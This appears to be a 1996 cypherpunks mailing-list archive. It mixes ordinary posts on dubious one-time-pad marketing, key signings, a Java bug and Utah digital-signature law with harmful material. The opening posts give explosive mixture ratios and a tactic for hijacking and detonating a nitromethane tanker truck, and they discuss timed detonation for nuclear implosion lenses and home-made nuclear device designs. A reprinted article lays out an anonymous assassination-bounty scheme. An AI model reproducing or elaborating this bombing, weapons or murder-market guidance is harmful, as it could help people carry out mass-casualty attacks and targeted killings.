flowing like a liquid.  Nitromethane is "oxygen-poor" to start out with.

>Nitromethane with ammonium nitrate
>gives you "a direct substitute for TNT" which can be set off with a
>blasting cap.

Easily.  And even better, ammonium nitrate is "oxygen rich" so tht you can 
get efficient use of the nitromethane.  A 2-1 mixture by weight (AN, 2,
nitromethane, 
1) is stoichiometric, as I recall.  They are not miscible in all 
proportions, however, so you'd have to settle for a finely-powdered slurry.

That's why I specified a HOMOGENOUS liquid as the tube-filler.  At least 
that way you know it's a consistent mix, as opposed to a slurry which would 
settle.


>) The liquid if sensitized can be detonated with a blasting
>cap but a compound detonator produces higher velocity. They claim that
>nitromethane won't detonate in its pure state,

I doubt this.  I'll test it, however, within the next year or so.

> but if sensitized is more powerful than TNT.

That wouldn't be surprising.  TNT is EXTRAORDINARILY 'oxygen-poor.'  It's 
about as far as you get from being an "efficient" explosive. 

>Nitromethane is used for racing fuel and other high-volume purposes,
>and must be transported in tanker-truck quantities. If someone wanted
>to make a very large conventional bomb quickly, such a truck is about
>as close as you get to a ready-made bomb. It could be ready within
>hours after the truck was hijacked.

Hours?  Aw, C'mon!  Minutes!  Maybe even 60 seconds.   The biggest 
impediment is figuring out how to open the tank, but even that could be 
avoided by drilling through the wall with a self-sealing "screw" assembly, 
one that would drain a bit of liquid into a detonator channel...    These 
tankers are probably usually made either of aluminum or stainless steel, and 
they could probably be pierced comparatively easily with a screw or a 
pointed  probe, or even a drill arranged to seal after the flukes had 
pierced. (Makita's are REALLY useful!) Drilling aluminum is easy; drilling 
stainless steel's normally a bitch because it work-hardens, but you're not 
looking for a pretty result so you'd just design with a nicely-sharpened 
carbide tip (a little work with a masonry bit and a sacrificial grinding 
wheel will work wonders) and be prepared for anything up to and including 
tool steel.  The hole would only have to be 1/8" or even smaller (or maybe 
not even necessary, triggering through the wall is certainly possible, too, 
but it would require more than a lowly cap.) and you can apply enormous 
forces to a short drill bit.

>
>If you had more time to kill, so to speak, mix it with a larger
>quantity of ammonium nitrate to get a lot more bang for your buck.

I don't think it would be worth it.  If the tanker was full, you'd merely be 
replacing one fair explosive with another, and it would take a lot of work 
to grind up the AN and mix it with the contents of the tank.   You'd be 
wasting time, risking the operation of an anti-highjacking alarm system,  
and risking detection and leaving evidence of intent.  Just highjacking the 
truck, later followed  by a huge explosion, would "leave 'em guessing" about 
what really happened.

I guess the world is fortunate I'm not into this sorta stuff, huh?!?


>> > I'm not sure what the
>> >minimum cross-sectional area is for a proper detonation.
>> 
>> That's a good question; I really don't know.  It ought to be rather low for 
>> a liquid explosive, but when the opportunity presents itself I'll do my own 
>> experiments.
>
>What would be the simplest way to compare relative arrival times
>between two tubes? Since the result of an explosion is a plasma,
>electrodes placed in the tube at the far end should become conductive
>as the wave reaches them. So a dual channel oscilloscope, with the
>sweep triggered as the cap is detonated, should be able to compare the
>propagation through two tubes detonated by the same cap.

Me, I'd do it digitally.  Set up a master 100 MHz clock, for 10 nsec time 
resolution, feed it to a master counter made up of modern 74ACXXX 
synchronous counters, then take the count chain and buffer it into a bus 
connected to a slew of edge-triggered latches, with appropriate amplifiers 
and  extra circuitry to guard against double-clocking.  You could connect up 
as many latches as you wanted, fed from various points in a triggered 
system.  ("fanout limited," but then again, multiple buffering is easy to 
do, as well.)   "All" the data could be taken in one shot, maybe.  Dozens or 
even hundreds of locations.

I'd test simultaneity after multiple long lenths of parallel fine tubing, 
variations in velocity with diameter, effect of curvature, everything.  One 
"bang" and I'm done.  It would be easy to measure the detonation velocities 
of the "lens" explosives as well, probably to well under 0.1% accuracy.  (I 
wonder if nitromethane could act as one of them?!? Would it dissolve or 
weaken a solid explosive?  Can a solid explosive with a "compatible" 
detonation velocity be found?)

I only have a fair background in optics, but since the principle of the 
lensing effect is general it should be easy to figure out what the shape of 
the lenses would be.  Casting the lenses is probably the technique I'd use, 
since surprisingly enough most nitrated organic explosives will melt long 
before they might be inclined to explode.  TNT, for instance, has long been 
poured as a liquid into artillery shells, melted in steam-jacketed kettles.

At least four molds would be necessary:  Pentagonal and hexagonal versions 
of the inner and outer explosive.

>> Again, that's a matter I'm unsure of.  Part of the reason I specifi
ed THIN 
>> tubing is so it "appears" to be linear, from a detonation-velocity point of 
>> view.  All of this should be easily measureable, however.  I'd probably 
also 
>> want to measure the relative velocity in two different-sized tubes, to find 
>> out if there is a significant difference that could be exploited or avoided.
>
>This would be fun to play with, and the kind of thing the government
>would not like to see written up. Measure the speed versus tube
>diameter and radius of curvature. If radius has a significant effect,
>things get complex.

True, but I suspect that the variation is going to be smaller than is 
significant, or at least it can be measured and compensated for.  Chances 
are that "military-grade" accuracies are straightforwardly possible.

BTW, feel free to keep and forward this note to anyone you feel would be 
interested in this information.  I'd appreciate getting confirmation or 
corrections, for curiosity's sake if nothing else.


Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 22 Feb 1996 19:40:54 +0800
Subject: No Subject
Message-ID: <QQadzy29567.199602221137@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, ipgsales@cyberstation.net writes:

> Who said that we are expanding OTP's -

I believe you did, when you stated that your "OTP" (and I am only using
"OTP" in this case to point up your misusage of the term, and not to
claim that what you are doing is any such thing) is used to seed your
"RNG" (another misnomer).

> we are using them to drive RNG's
> please read my mail back and forth with Derek and Roy Silvernail,

Do remember that the majority of my mail has not been copied to the
list.

> I belive that both of then recognize that an extremely large key, 2
> to some large number, let us say for the time being 2 to 12288 bits
> can be derived from a OTP when generated-

Not a chance, slick.  A One-Time Pad is well defined within the art, and
your PRNG system is no such thing.  I will thank you to not postulate
what I may or may not recognize.
- -- 
Roy M. Silvernail --  roy@cybrspc.mn.org will do just fine, thanks.
          "Does that not fit in with your plans?"
                      -- Mr Wiggen, of Ironside and Malone (Monty Python)
          PGP public key available upon request (send yours)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSwTVhvikii9febJAQEtpgP+MqcESnrisA8tYT+GulGamEhMIa9gTKAn
Dc1ylyG4pgMRW+osZnnBJcWeZq8Yx7aTzteTmkNYmpXZP9liVaySSOVce36ORG4X
BnRO2OGLI3JD8ssgMbifxbZay/00bDdCuMthGnXA+xKAW27p9i9tHLrPIyJhdjZa
Jd3rHWCqwCc=
=Cx0p
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 22 Feb 1996 19:43:36 +0800
Subject: No Subject
Message-ID: <QQadzy29675.199602221139@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


"Assassination Politics" Part 8

The following article appeared in the Sunday, February 4, 1996 issue of 
Asahi Evening News, in an article written by columnist Paul Maxwell, page 6. 
He writes a regular column about the Internet for this newspaper.

"Networks:  Paul Maxwell"

"Dial Internet for murder"

'The first thing we do, let's kill all the lawyers."  (Shakespeare, Henry VI).

A startling and controversial idea has surfaced on the Internet 
recently--fear with me for a moment while I explain it.  It is based on two 
technological developments:  digital cash and encryption software.

Briefly, digital cash is a system for transferring funds from one person to 
another on the Net.  For this system to be as good as cash, the transactions 
must be capable of being conducted anonymously, just like in real life.  
(You go into the Seven-Eleven, buy a Cafe Latte, and nobody knows your name 
or your credit history.  The purchase is not recorded in a database of your 
consumer preferences.)

Several competing schemes for digital cash have been launched,  but the one 
that eventually gains universal acceptance will surely have this anonymity 
feature.

The second innovation is a kind of software called public-key encryption.  
It allows you to send a file or an email message that is "locked" in such a 
way that it can only be opened by the intended recipient.  The recipient, 
however, cannot open it until given a "key."  This "key" may then be used to 
encrypt a return message that can only be opened by the original sender.

Freelance visionary and tinkerer Jim Bell has been following both of these 
developments for the past few years.  Recently, he asked himself a couple of 
tough questions:  "How can we translate the freedom afforded by the Internet 
to ordinary life?"  How can we keep government from banning encryption, 
digital cash, and other systems that will improve our freedom?"

Suddenly, Bell had a revolutionary idea.  ("Revolutionary" is the word he 
uses, and it fits.)  You and me--the little guys, the ordinary working 
people of the world--could get together, all pitch in, and pay to have every 
rotten scoundrel in politics assassinated.  And we could do it legally.  
Sort of.

Bell imagined an organization that would award "a cash prize to somebody who 
correctly 'predicted' the death of one of a list of violators of rights, 
usually either government employees, officeholders, or appointees.  It could 
ask for anonymous contributions from the public, and individuals would be 
able to send those contributions using digital cash."


He explains that "using modern methods of public-key encryption and 
anonymous digital cash, it would be possible to make such awards in such a 
way so that nobody knows who is getting awarded the money,  only that the 
award is being given.  Even the organization itself would have no 
information that could help the authorities find the 
person responsible for the prediction, let alone the one who caused the death."


Are you following this?  Let's say that we, the public, decide we've finally 
had enough of [insert name of villain].  Ten dollars from me, ten from 
you--suddenly there's a million dollars in a fund.  The money will go to the 
first person who can "predict" the date, time, and circumstances of the 
villain's death.  Obviously, this information is only known in advance by 
the assassin.

He sends an anonymous, "locked" message.  He kills the villain.  He sends 
the "key" to the message.  He has, without ever revealing his identity,  
"correctly predicted" the murder.  The "key" that he has provided is then 
used to "lock the award money in a file that is then publicly posted on the 
Internet.  Only the person who originated the key may open the file and 
claim the digital cash.

In other words, public anger could finance cash awards for assassinations.  
The organization that collected the money and announced a list of possible 
targets would never know about a crime in advance, and would never know the 
identity or whereabouts of a criminal.  It would not technically be guilty of 
conspiracy or complicity.

Jim Bell has thought about this a lot, and feels that the idea is 
technically feasible, practical, even foolproof.  Suppose for 
a moment he's right?  What are the implications?

World leaders live with the threat of assassination every day of their 
lives.  But at the local level, this could really have 
an impact.  And the "target" list wouldn't necessarily to politicians--any 
offensive public  personality would be fair game.  Picture yourself a year 
from now, sitting around with friends.   Somebody says, "Remember when Juice 
Newton got whacked?"   And you say, "Yeah--best ten bucks I ever spent."

Satisfying as it might be to declare war on asinine pop singers, Bell has a 
more civic-minded suggestion:  Let's kill all the car thieves.  He reasons 
that a very small number of career criminals are responsible for nearly all 
car thefts.  If one million car owners in a given metropolitan area 
contributed just four dollars a year, it would create $10,000 a day in 
"prize money" for the "predictor" of any car thief's death.

"Assuming that amount is far more than enough to get a typical car thief's 
'friends' to 'off' him," he writes, "there is simply no way that a 
substantial car-theft subculture could possibly be maintained."

Jim as high hopes for his plan--he thinks it could eventually lead to the 
end of political tyranny.  But if you don't like this idea, he has others.  
In a recent email exchange, I asked what he was doing now.

"I recommend that you rent the movie, "The Day the Earth Stood Still.," he 
answered.  "I'm working on a similar project."

[end of article]









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 22 Feb 1996 19:43:46 +0800
Subject: No Subject
Message-ID: <QQadzy29730.199602221140@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 18 Feb 1996, jim bell wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> At 10:25 PM 2/18/96 EDT, E. ALLEN SMITH wrote:
> >	I've been kind of busy recently (the reason I haven't responded to
> >the more recent Assasination Politics stuff), but I'm curious what 
> >your method is for achieving simultaneous explosions.
> 
> 
> "Multiple very thin flexible hollow tubes (1 mm ID? teflon?) filled with a
> homogenous liquid 
> explosive (for example, pure nitromethane), length accurately cut to produce 
> the exactly desired delay.  Kept separated from each other by foam spacers 
> to avoid inter-fiber detonations. Detonated from a single cap, with an 
> intermediary chamber of liquid explosive to stabilize the shock front, the 
> detonation wave travels along each tube simultaneously at (presumably) 
> identical velocity."

This method is so dependent on the uniformity of the initiator (the cap 
in this instance) as to be nearly useless.  Normal blasting caps do not 
detonate with the uniformity required to initiate each of the tube paths 
at the same time.  In the off chance that you contemplated surrounding 
the cap with liquid explosive of a sufficent type, (which still wouldn't 
assure proper uniformity with any certainty as the liquid explosive is as 
likely to detonate slightly off left to right as up to down) you still have 
extremely difficult problems to overcome.

1>  Interference from the milling shape and accuracy of the openings to 
the tubes containing the liquid explosive.

2>  Mild to obscure impurities in the liquid explosives causing 
differences in velocity with respect to other tubes.  Even small changes 
in pressures within the tubes might cause enough timing problems to make 
uniform initiation of the primary high explosive assembly impossible.

3>  Interference from the milling shape and accuracy of the terminus of 
the tubes containing the liquid explosive.

4>  Overpressure in the device causing premature detonation of the near 
portion of the high explosive assembly.

All of these might cause enough timing error to prevent uniform pressure 
and thus prevent uniform compression and make supercriticality impossible.

Remember, kryonic switiches are necessary even when dealing with the 
speeds of electric conductivity.  The velocities of even hydrazine based 
explosives are signigicantly lower.  The margin for error is similarly lower.

Plutonium gun is still the easiest method for the home grown nuclear 
device, even if it requires more fissile material.

> It's a race, designed so that the detonation waves reach their targets (the
> foci) at 
> the same time.  If the detonation velocity was, say, 5,000 meters per 
> second, an accuracy of 0.5 millimeter in length would produce a delay 
> accuracy  of 100 nanoseconds.
>
> Whatcha think?
> 
> Now where did I put that pit...   <G>
>
> Jim Bell
> jimbell@pacifier.com
> 
> Klaatu Burada Nikto
> 
> -----BEGIN PGP SIGNATURE-----
[...]
> -----END PGP SIGNATURE----- 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 23 Feb 1996 02:31:04 +0800
Subject: No Subject
Message-ID: <QQadzy29932.199602221143@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


At 11:53 PM 2/21/96, Adam philipp wrote:

>   Don't forget to bring your public key fingerprint (and two forms of ID).
>If you can figure out how to get a PGP fingerprint on the back of a business
>card, that would be cool.

This is an unusual development, asking for "two forms of ID." If I attend,
can I use the "May Company" ID card I had printed up, or are only State of
California and El Cajon Public Library cards accepted?

We've had several key-signings in the Bay Area, and at none of the ones
I've seen has there been any demand for "two forms of ID." In fact, I
understand that some of the keys signed were for people whose nom de list
differs from what Sacramento knows them by. Lucky Green might want to
comment.

This gets back to the familiar issue of what it is a name credential really
means, and whether we care.

--Tim May, the name I use for this list


Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 23 Feb 1996 02:27:26 +0800
Subject: No Subject
Message-ID: <QQadzy00104.199602221144@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


At 12:32 PM 2/21/96 -0800, Wink Junior wrote:

>I must admit that after the first day I've been wondering if this whole
>IPG thing isn't some kind of deep troll or early April Fool's joke.  

It is part of the "Trolling Cryptographers Protocol Internet Protocol".  The
"TCP/IP" is a secret government project to keep cryptographers busy by
posting trolls to various newsgroups where they hang out.  (Sometimes they
cross post to various groups using the same technique.  This is known as a
"Troll Bridge".)  It is a followup to the evil and ancient "Asyncronous
Protocols of the Elders of Zion. (Also known as IPv1.) The next upcoming
plot is when they Imminatize the Eschaton with the most evil plot of all...
IPv666!  (Thankfully it only works under Windows 95 so far.)
|   Remember: Life is not always champagne. Sometimes it is REAL pain.   |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Thu, 22 Feb 1996 21:48:34 +0800
To: perry@piermont.com
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <Pine.BSD/.3.91.960221145534.3814H-100000@citrine.cyberstation.net>
Message-ID: <9602221320.AA16955@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Perry E. Metzger writes:
 > If you start with 100 bits of entropy, your stream will have only 100
 > bits of entropy. If you start with 1024 bits, you will have a kilobit
 > of entropy, and so forth.
 > 
 > This may seem like a lot, but it really isn't.

...and note that IPG does us the favor of ensuring the keys conform to
this elaborate battery of statistical tests.  Thus, there are bunches
of keys that "aren't random enough" and thus not among the set to be
considered when trying to break one.

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * I want more, I want more,
       m5@tivoli.com * m101@io.com          * I want more, I want more ...
      <URL:http://www.io.com/~m101>         *_______________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geeman@best.com
Date: Fri, 23 Feb 1996 00:35:45 +0800
To: cypherpunks@toad.com
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
Message-ID: <199602221529.HAA06532@napalm.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain



 IDG: Get real.  Publish the stuff like the rest of the world does.  The
only ones who don't are just not players in the game.  If you want to try to
snow consumer-types then go ahead.  But if you want validation from the
crypto community you'll have to just publish it. 

And if you don't, and just continue the marketing fluff, then people from
this list, and others in the community, will be all over you and the
publications (lists, press, etc) with the theoretical and inferred
weaknesses of your system. 

I would say the onus is on you to put up or shut up and don't try to
orchestrate or control the parameters of the disclosure.  It's really in
your own interests, I would think.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Thu, 22 Feb 1996 22:06:17 +0800
To: perry@piermont.com
Subject: Re: BIG JAVA SECURITY HOLE
In-Reply-To: <c=US%a=_%p=INTERGRAPH%l=HQ6960221161902DK003B00@hq13.pcmail.ingr.com>
Message-ID: <9602221339.AA15504@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Perry E. Metzger quotes:

 > > A second, also serious, bug exists in javap, the bytecode
 > > disassembler.

I haven't figured out how this is anything more than a simple bug,
unless one presumes you could concoct a trojan horse in the form of a
"really cool applet that ya just gotta disassemble dudez".

[Maybe that really is it.]

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * I want more, I want more,
       m5@tivoli.com * m101@io.com          * I want more, I want more ...
      <URL:http://www.io.com/~m101>         *_______________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Thu, 22 Feb 1996 22:20:33 +0800
To: Bruce Baugh <bruce@aracnet.com>
Subject: Re: A Challenge (perhaps!)
In-Reply-To: <2.2.32.19960222104535.006945e8@mail.aracnet.com>
Message-ID: <9602221346.AA16948@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Bruce Baugh writes:
 > >I know it doesn't exercise key technology and relies on the secrecy of the
 > >algorithm (which from my very limited knowledge on cryptography I think makes
 > >it almost doomed from the start (?))... 
 > 
 > Yes, it does. 

The way I like to think of such a scheme is to consider the secret
algorithm itself to be the key, which then drives the cryptosystem
composed of the CPU instruction sequencer on the encrypting machine.
Thus all messages are encrypted with the same key; it should be easy
to see why that isn't secure.

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * I want more, I want more,
       m5@tivoli.com * m101@io.com          * I want more, I want more ...
      <URL:http://www.io.com/~m101>         *_______________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jack Keith <jkeith@panix.com>
Date: Thu, 22 Feb 1996 23:59:55 +0800
To: sea-list@panix.com
Subject: Digital Signature Legislation (fwd)
Message-ID: <Pine.SUN.3.91.960222080845.5326A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Wed, 21 Feb 1996 10:25:39 -0800 (PST)
From: Phil Agre <pagre@weber.ucsd.edu>
To: rre@weber.ucsd.edu
Subject: Digital Signature Legislation

[This message includes some interesting information about significant
consumer and privacy issues in state-level "digital signature" legislation
that is being modeled on Utah's law -- http://www.state.ut.us/ccjj/digsig/
It is also an example of a trend I'd like to encourage: academics using the
Internet to propagate ideas in concise, useful form while getting feedback
from a broad public before their work gets frozen forever in journals.]

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: Tue, 20 Feb 1996 20:54:03 -0800 (PST)
From: C. Bradford Biddle <biddle@pwa.acusd.edu>
To: ca-digsig@commerce.net
Subject: Digital Signature Legislation


DIGITAL SIGNATURE LEGISLATION: SOME REASONS FOR CONCERN

by Brad Biddle <biddle@acusd.edu>
February 20, 1996

[Copyright 1996 by Brad Biddle; permission granted for non-commercial 
electronic redistribution]

A recent flurry of state digital signature legislation should provoke some
concern among consumer activists, privacy advocates, and others interested
in the evolving legal landscape of cyberspace. 

At least ten states are developing or have already implemented digital
signature legislation. Much of this legislation is based on the pioneering
Utah Digital Signature Act, passed in 1995 (and currently in the process
of being amended). States which have introduced legislation based on the
Utah Act include Arizona, Georgia, Hawaii, Oregon, and Washington.
California has passed a different form of digital signature legislation,
and a bill is pending in Illinois which is similar to the California
approach. Florida and Virginia have formal resolutions pending which call
for legislative investigation into digital signature laws. 

The American Bar Association's Information Security Committee (a
sub-committee of the Section of Science and Technology) released its
Digital Signature Guidelines in October of 1995. These Guidelines are
"general, abstract statements of principle" and are not intended as model
legislation. The Information Security Committee intended to release model
digital signature legislation in June of 1995, but this effort has been,
as one report describes it, "stymied by bureaucratic maneuvering."
(Information Law Alert, 10/13/95). In the absence of this model
legislation, the Utah Act has become a de facto model act. 

The intent of this message (distributed to the "ca-digsig" mailing list
and to some other folks via direct e-mail) is to raise some concerns about
the Utah Digital Signature Act and its progeny. The author of this message
is a second-year law student at the University of San Diego School of Law,
and is writing an article on this topic for the San Diego Law Review.
Feedback and criticism are very welcome, and will likely be incorporated
into the developing article. 

THE UTAH DIGITAL SIGNATURE ACT 
[Sec. 46-3-101 et seq., Utah Code Annotated 1953]

No attempt will be made here to explain or summarize the complex and
detailed provisions of the Act. Generally, the Act envisions an
infrastructure in which computer users utilize state-licensed
certification authorities, online databases called repositories, and
public-key encryption technology in order to "sign"  electronic documents
in a legally binding fashion. The Utah Act sets out an ambitious legal and
regulatory framework intended to implement a public key infrastructure. 
It also carves out a place for digital signatures in the broader legal
landscape.  That is, it provides digital signatures with legal status as
valid signatures and addresses a variety of issues relating to the place
of electronic documents in contract and evidence law. 

Much of what the Utah Act accomplishes is laudable, and demonstrates how
legislation can effectively solve unsettled issues in the novel arena of
cyberspace. However, several aspects of the Act are troubling. The
potential problem areas can be categorized generally as liability,
privacy, and costs. A very brief discussion of each of these problem areas
follows. 

LIABILITY

The Utah Act makes two policy choices concerning liability allocation
which are potentially troubling. First, consumers who participate in the
infrastructure developed under the Utah Act subject themselves to a far
greater risk of extensive liability than they face in other electronic
transactions, such as credit card or debit card transactions. Most
electronic transactions made by consumers are subject the Electronic Funds
Transfer Act (EFTA) which limits consumer liability in the event of fraud
to (in most cases) $50. Even if a consumer is negligent, liability is
still capped at a rather low fixed amount. Critics of this scheme argue
that it is paternalistic and ultimately drives up costs for other
consumers who are careful to avoid exposing themselves to fraud.
Supporters argue that if consumers were exposed to potential unlimited
liability when engaging in electronic transactions they would not
participate in these transactions at all, and the potential benefits of
electronic transactions would not be achieved. Also, supporters say,
consumers are often unable to prevent fraud, and forcing consumers to
prove they were not negligent anytime fraud occurs would be an
unreasonable burden. 

Under the Utah Act, consumers are held to a negligence standard in
guarding their private encryption key. Thus, if a criminal obtains a
consumer's private key and commits fraud, the consumer is financially
responsible for that fraud unless the consumer can prove that the consumer
used reasonable care in guarding the private key. If the consumer cannot
prove this in court, or if the consumer was in fact negligent, then the
consumer will bear all losses resulting from the fraud. The arguments in
support of the EFTA may be applicable here. Will consumers participate in
a system which subjects them to unlimited liability? Is it sensible to
make consumers prove the absence of negligence? 

(Two related points are worth noting. First, drafters of the Utah Act
initially advocated a strict liability standard, rather than negligence,
for the security of private keys -- even "worse" for consumers -- and the
drafters continue to advocate strict liability as an alternative for other
state legislators considering digital signature laws. Second, a plausible
argument can be made that the federal EFTA should preempt the state
digital signature legislation on this issue -- this question is
unsettled.)

There is a second troubling policy choice relating to liability. The Utah
Act limits the potential liability of one actor in the infrastructure --
the certification authority -- to a fixed amount (termed a "suitable
guarantee" and determined by a complex formula or by administrative rule).
This amount may be less than the actual damages a certification authority
can cause. This policy decision, designed to create certainty for an
entrepreneur contemplating a certification authority business and foster
development of a certification authority industry, may have unintended
consequences. It is easy to envision a scenario in which a certification
authority's private key is compromised -- by brute force cryptanalysis,
bribery, or incompetence, for example. A criminal with a certification
authority's private key could cause an immense amount of financial damage,
imposing huge losses on a number of innocent parties. These innocent
parties would be unable to recover their full losses from the
certification authority if the total of these losses was greater than the
amount of the "suitable guarantee" -- even if the certification authority
was totally at fault in creating the circumstances that led to the losses. 
Because the certification authority would not have to bear the full costs
of any losses resulting from a compromised private key, they may not have
the incentive to take expensive precautions to protect against that
occurrence. 


PRIVACY

The system contemplated by the Utah Act also raises several different
types of privacy-related concerns. At a broad level, one commentator has
pronounced the general type of system embodied in the Utah Act a "cultural
misfit"  because every merchant and consumer potentially must register
with an outside authority in order to acquire the basic capacity to
transact commerce. In light of the more limited scope of the Utah Act and
the current state of electronic commerce, however, this argument is not
particularly persuasive. 

More significantly, under the Utah Act's approach certain entities -- the
online databases of public encryption keys termed "recognized
repositories" -- will have unrestricted access to valuable
transaction-generated information that could expose sensitive
relationships among individuals or businesses. If Company A sends a
digitally signed message to Company B, Company B must verify the digital
signature by connecting to a state-recognized privately-managed database,
verifying the digital signature and making sure that Company A's
certificate is not on a certificate revocation list. This process, of
course, will leave electronic footprints. Could the owner of the
recognized repository disclose the fact that A and B were corresponding?
What if A and B were discussing a possible merger, or other transaction
with significant consequences in the securities markets?  Similarly, could
the owner of the repository disclose to Joe Whistleblower's
defense-contractor employer that Whistleblower was verifying digital
signatures of a reporter from the New York Times? The Utah Act is totally
silent on this issue. 

Additionally, the public databases contemplated by the Act could expose
financial data, information about affiliations, and other private
information to public scrutiny -- and put this information into the direct
marketing universe. Publicly-accessible certificates will contain the name
of subscribers and a "recommended reliance limit," a dollar figure that
may be a good indication of general financial standing. Certificates may
also indicate an individual's affiliation with a company or other
organization. There is no provision for anonymous or pseudonymous
certificates. Proponents of the Utah Act point out that participation in
the system established by the Act is voluntary, and that non-licensed
certification authorities will be available for individuals who object to
the requirements of the Act. However, in light of the advantages the Act
gives to licensed certification authorities (liability limitations,
presumptions concerning the legality of digital signatures, and the like)
this may not in fact turn out to be true. Additionally, some individuals
may be forced to use certificates in the course of their employment. Would
an employee who did not want to be listed in an easily searchable database
(perhaps because they were being harassed) be forced to quit his or her
job? 


Finally, a very important privacy-related issue that is purposefully not
addressed in the Utah Act concerns whether the infrastructure contemplated
by the Act will support confidentiality of messages as well as legally
binding digital signatures (a technically feasible proposition, but a
politically sensitive one). The Utah Act empowers an administrative agency
to determine which public key encryption algorithms are appropriate. A
public key algorithm like RSA can be used both for encryption and digital
signatures. A public key algorithm like DSA (implemented in DSS) can only
be used for digital signatures -- it cannot be used to encrypt messages.
Should such a fundamental policy decision be made in the obscurity of an
administrative agency's rulemaking process? 

COSTS

The Utah Digital Signature Act also raises several issues relating to
costs. The institutional overhead associated with creating and maintaining
the Act's infrastructure will be passed along to participants, and
participants must have access to expensive computer hardware and software
in order to participate in the system. One issue not addressed by the Utah
Act is whether citizens who are unable to afford these costs should be
provided with subsidized or reduced-cost access to th infrastructure. A
prominent commentator has noted that, in the long term, the type of system
embodied in the Utah Act is "anticipated to become indispensable for
conducting government, business, and even private affairs." 

Another cost-related issue concerns the costs associated with legislative
endorsement of one particular technology (public-key encryption
technology, or more narrowly, specific implementations of this technology)
and whether this endorsement will affect the development of alternative
solutions to the problems posed by communications over open computer
networks. An advocate of a particular biometric technology has argued that
the type of infrastructure contemplated by the Utah Act is costly
overkill, and is far more complex and expensive than is necessary. Even if
one accepts the appropriateness of a public-key approach, note that costs
could vary widely depending upon which particular proprietary encryption
algorithms are licensed. 

As originally passed, the Utah Act limited the role of certification
authority to Utah-licensed attorneys, financial institutions, title
companies, and government agencies. This sort of oligopolistic arrangement
is, of course, anathema to a vibrant, competitive market which would drive
down costs for consumers. The pending amendments to the Utah Act eliminate
this requirement. Some of the states which are following the Utah Act as a
model have retained this limitation, however. 

CONCLUSION

Legislative activity concerning digital signatures is generally
appropriate and potentially helpful. The Utah Digital Signature Act,
particularly its provisions establishing the legal status of digital
signatures, is a step in the right direction. However, lawmakers
contemplating digital signature legislation should reconsider some of the
policy choices made by the Utah Act. 

-------------------------------------------------


Brad Biddle, Legal Intern <biddle@acusd.edu>
Privacy Rights Clearinghouse, Ctr for Public Interest Law
http://pwa.acusd.edu/~prc

[The views expressed in this article are not necessarily those of the 
Privacy Rights Clearinghouse or the Center for Public Interest Law.]







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 24 Feb 1996 06:36:25 +0800
To: ponder@wane-leon-mail.scri.fsu.edu
Subject: pcmcia
